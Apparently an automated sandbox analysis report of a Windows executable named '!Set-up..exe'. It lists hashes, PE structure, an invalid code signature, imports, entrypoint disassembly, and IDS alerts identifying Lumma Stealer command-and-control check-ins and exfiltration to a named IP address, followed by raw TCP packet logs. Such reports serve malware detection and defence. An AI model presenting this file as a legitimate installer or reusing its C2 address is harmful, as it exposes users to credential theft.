                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:!Set-up..exe
                                                            File size:14'866'519 bytes
                                                            MD5:27968eebcb115c6ecb62199a98ce9ee6
                                                            SHA1:7892f28bf31caf505e792268e138210588aa4d8d
                                                            SHA256:a124b81ef52d77f88c5b00f0a999482d429602f3cf5a413b3860c2b45909272d
                                                            SHA512:60afd0ab796b4f96733b24fb83fe9a4a60833a10e8b2961a3e8fa4b9b29d6ea469fb92bb1161299cc094afcbfcd9db2249dee6ab97840171a41b8917ed648424
                                                            SSDEEP:24576:JfK4O0f5F4PCxULgB/88cv15mKLTanYE2caHvdzzfn2eK:3L5gcB/88cDPLT0i9f2eK
                                                            TLSH:6BE6C47073FCD079D81608C1EA92B5D39627E6B2B0C3146CA2585EED31B310DBE9DB69
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...N...B...8.....

                                                            File Icon

                                                            Icon Hash:41c4d42c79596d41

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4038af
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 14/06/2024 05:25:33 24/08/2025 02:08:55
                                                            Subject Chain
                                                            • CN=Nox Limited, OU=IT, O=Nox Limited, L=Beijing, S=Beijing, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=Beijing, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=911101083302797532, OID.2.5.4.15=Private Organization
                                                            Version:3
                                                            Thumbprint MD5:DBDA3B2A7B9BCBCB6848546630032BBC
                                                            Thumbprint SHA-1:D0E0723E97AFFB6654D2A219076FFAA775A3211B
                                                            Thumbprint SHA-256:BC94198163C2DA318A3571ACE8CB7CD8DFAD1C50FD09890C8A3A0FF0557393E1
                                                            Serial:3B5F7487FE8960073A53D8C4

                                                            Entrypoint Preview

                                                            Instruction
                                                            sub esp, 000002D4h
                                                            push ebx
                                                            push ebp
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            xor ebp, ebp
                                                            pop esi
                                                            mov dword ptr [esp+18h], ebp
                                                            mov dword ptr [esp+10h], 0040A268h
                                                            mov dword ptr [esp+14h], ebp
                                                            call dword ptr [00409030h]
                                                            push 00008001h
                                                            call dword ptr [004090B4h]
                                                            push ebp
                                                            call dword ptr [004092C0h]
                                                            push 00000008h
                                                            mov dword ptr [0047EB98h], eax
                                                            call 00007FB82CF0434Bh
                                                            push ebp
                                                            push 000002B4h
                                                            mov dword ptr [0047EAB0h], eax
                                                            lea eax, dword ptr [esp+38h]
                                                            push eax
                                                            push ebp
                                                            push 0040A264h
                                                            call dword ptr [00409184h]
                                                            push 0040A24Ch
                                                            push 00476AA0h
                                                            call 00007FB82CF0402Dh
                                                            call dword ptr [004090B0h]
                                                            push eax
                                                            mov edi, 004CF0A0h
                                                            push edi
                                                            call 00007FB82CF0401Bh
                                                            push ebp
                                                            call dword ptr [00409134h]
                                                            cmp word ptr [004CF0A0h], 0022h
                                                            mov dword ptr [0047EAB8h], eax
                                                            mov eax, edi
                                                            jne 00007FB82CF0191Ah
                                                            push 00000022h
                                                            pop esi
                                                            mov eax, 004CF0A2h
                                                            push esi
                                                            push eax
                                                            call 00007FB82CF03CF1h
                                                            push eax
                                                            call dword ptr [00409260h]
                                                            mov esi, eax
                                                            mov dword ptr [esp+1Ch], esi
                                                            jmp 00007FB82CF019A3h
                                                            push 00000020h
                                                            pop ebx
                                                            cmp ax, bx
                                                            jne 00007FB82CF0191Ah
                                                            add esi, 02h
                                                            cmp word ptr [esi], bx

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ C ] VS2010 SP1 build 40219
                                                            • [RES] VS2010 SP1 build 40219
                                                            • [LNK] VS2010 SP1 build 40219

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x2e0de.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xe2a95f0x2ef8
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x1000000x2e0de0x2e200ce5bbc296f77bb94a8c8f9aca1e2922bFalse0.2826632367886179data5.3217470933306865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x12f0000xfd60x100098b5852fe7cbf1ae227944ba00d536abFalse0.567626953125data5.312168663390484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x10042c0x1f50PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013722554890219
                                                            RT_ICON0x10237c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.4860659072416599
                                                            RT_ICON0x1049e40x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5398451730418944
                                                            RT_ICON0x105b0c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.650709219858156
                                                            RT_ICON0x105f740x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.15040518159233407
                                                            RT_ICON0x11679c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.24603216312802187
                                                            RT_ICON0x11fc440x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.2909426987060998
                                                            RT_ICON0x1250cc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.25301133679735477
                                                            RT_ICON0x1292f40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.3447095435684647
                                                            RT_ICON0x12b89c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.38907129455909945
                                                            RT_ICON0x12c9440x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.4959016393442623
                                                            RT_ICON0x12d2cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5558510638297872
                                                            RT_DIALOG0x12d7340x100dataEnglishUnited States0.5234375
                                                            RT_DIALOG0x12d8340x11cdataEnglishUnited States0.6056338028169014
                                                            RT_DIALOG0x12d9500x60dataEnglishUnited States0.7291666666666666
                                                            RT_GROUP_ICON0x12d9b00x76data0.7627118644067796
                                                            RT_GROUP_ICON0x12da280x3edataEnglishUnited States0.8225806451612904
                                                            RT_VERSION0x12da680x3a0dataEnglishUnited States0.4105603448275862
                                                            RT_MANIFEST0x12de080x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-28T21:35:56.856378+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549784172.67.213.115443TCP
                                                            2024-12-28T21:35:57.889164+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549784172.67.213.115443TCP
                                                            2024-12-28T21:35:57.889164+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549784172.67.213.115443TCP
                                                            2024-12-28T21:35:59.109107+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549790172.67.213.115443TCP
                                                            2024-12-28T21:35:59.860017+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549790172.67.213.115443TCP
                                                            2024-12-28T21:35:59.860017+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549790172.67.213.115443TCP
                                                            2024-12-28T21:36:01.379888+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549797172.67.213.115443TCP
                                                            2024-12-28T21:36:03.672548+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549803172.67.213.115443TCP
                                                            2024-12-28T21:36:04.494462+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549803172.67.213.115443TCP
                                                            2024-12-28T21:36:05.830553+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549809172.67.213.115443TCP
                                                            2024-12-28T21:36:08.201372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549815172.67.213.115443TCP
                                                            2024-12-28T21:36:10.507535+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549821172.67.213.115443TCP
                                                            2024-12-28T21:36:13.624453+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549831172.67.213.115443TCP
                                                            2024-12-28T21:36:14.406950+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549831172.67.213.115443TCP
                                                            2024-12-28T21:36:15.857196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549836172.67.75.40443TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 21:35:55.505404949 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:55.505428076 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:55.505565882 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:55.506822109 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:55.506836891 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:56.856273890 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:56.856378078 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:56.910312891 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:56.910322905 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:56.910563946 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:56.957211971 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.125634909 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.125654936 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.125730991 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:57.888971090 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:57.889053106 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:57.889132023 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.890855074 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.890865088 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:57.890894890 CET49784443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.890901089 CET44349784172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:57.897488117 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.897524118 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:57.897588015 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.897891998 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:57.897906065 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.108987093 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.109107018 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.110348940 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.110363007 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.110579967 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.113692999 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.113718987 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.113751888 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.859869003 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.859911919 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.859935045 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.859967947 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.859982014 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.859988928 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.860016108 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.860028982 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.860063076 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.868216991 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.876693964 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.880799055 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.880806923 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.885030985 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.888876915 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.888884068 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:35:59.940063000 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:35:59.979295969 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.035368919 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.051628113 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.055612087 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.055632114 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.055680037 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.055690050 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.055701971 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.055759907 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.055896044 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.055910110 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.055943012 CET49790443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.055949926 CET44349790172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.120758057 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.120785952 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:00.120872974 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.121197939 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:00.121211052 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:01.379781008 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:01.379888058 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:01.381772041 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:01.381783009 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:01.382028103 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:01.385680914 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:01.385802984 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:01.385832071 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:02.323647022 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:02.323729038 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:02.323888063 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:02.361145020 CET49797443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:02.361156940 CET44349797172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:02.459619045 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:02.459654093 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:02.459728003 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:02.460748911 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:02.460764885 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.672410011 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.672548056 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.673944950 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.673958063 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.674186945 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.677562952 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.677763939 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.677798986 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:03.677853107 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:03.723345995 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.494476080 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.494545937 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.494621038 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.494842052 CET49803443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.494863987 CET44349803172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.572468996 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.572494984 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:04.572578907 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.572877884 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:04.572891951 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.830362082 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.830553055 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.831829071 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.831835032 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.832026005 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.833442926 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.833570957 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.833595991 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:05.833678007 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:05.833684921 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.812208891 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.812299013 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.812366009 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.812540054 CET49809443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.812552929 CET44349809172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.894860983 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.894931078 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:06.895097971 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.895368099 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:06.895385981 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.201273918 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.201371908 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.204981089 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.205002069 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.205421925 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.206691027 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.206790924 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.206799030 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.966052055 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.966140032 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:08.966192007 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.966329098 CET49815443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:08.966346979 CET44349815172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:09.243052959 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:09.243088007 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:09.243159056 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:09.243419886 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:09.243432999 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.507436991 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.507534981 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.531601906 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.531619072 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.531810045 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.533833981 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534444094 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534478903 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534568071 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534609079 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534707069 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534734011 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534832001 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.534858942 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.534974098 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.535002947 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.535134077 CET49821443192.168.2.5172.67.213.115
